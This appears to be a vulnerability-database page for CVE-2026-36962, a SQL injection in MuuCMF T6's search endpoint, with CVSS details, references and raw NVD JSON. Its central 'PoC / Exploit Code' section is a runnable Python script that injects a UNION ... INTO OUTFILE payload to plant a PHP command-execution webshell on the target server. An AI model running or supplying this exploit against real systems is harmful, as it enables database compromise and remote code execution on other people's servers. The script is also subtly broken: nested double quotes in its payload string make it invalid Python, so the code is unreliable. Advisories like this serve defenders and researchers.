CVE-2026-36962

Description

SQL Injection in MuuCMF T6 v1.9.4.20260115 allows an unauthenticated attacker to compromise the entire database, achieve unauthorized administrative access, and potentially gain remote code execution by writing malicious files to the server's file system via the keyword parameter in the /index/controller/Search.php endpoint.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

MuuCMF T6 v1.9.4.20260115

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
import requests

def exploit_sqli(target_url):
    """
    PoC for CVE-2026-36962 SQL Injection in MuuCMF T6.
    Attempts to write a webshell via SQL Injection.
    """
    # Vulnerable endpoint
    endpoint = "/index/controller/Search.php"
    
    # Malicious payload to write a PHP shell
    # Note: This requires the MySQL user to have FILE privileges and known web root
    payload = "?keyword=test' UNION SELECT 1,2,3,4,'<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'-- -"
    
    full_url = target_url + endpoint + payload
    
    try:
        response = requests.get(full_url, timeout=10)
        if response.status_code == 200:
            print(f"[+] Payload sent to {full_url}")
            print("[+] Check if shell.php was created at /var/www/html/shell.php")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target URL
    target = "http://example.com"
    exploit_sqli(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-36962
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-36962
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-36962/
[4] VulDB https://vuldb.com/cve/CVE-2026-36962
[5] https://gitee.com/dameng100/muucmf
[6] https://thinhneee.github.io/posts/muucmf-sqli/
[7] https://thinhneee.github.io/posts/muucmf-sqli/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-36962", "sourceIdentifier": "[email protected]", "published": "2026-05-11T18:16:32.483", "lastModified": "2026-05-12T20:16:39.590", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL Injection in MuuCMF T6 v1.9.4.20260115 allows an unauthenticated attacker to compromise the entire database, achieve unauthorized administrative access, and potentially gain remote code execution by writing malicious files to the server's file system via the keyword parameter in the /index/controller/Search.php endpoint."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://gitee.com/dameng100/muucmf", "source": "[email protected]"}, {"url": "https://thinhneee.github.io/posts/muucmf-sqli/", "source": "[email protected]"}, {"url": "https://thinhneee.github.io/posts/muucmf-sqli/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}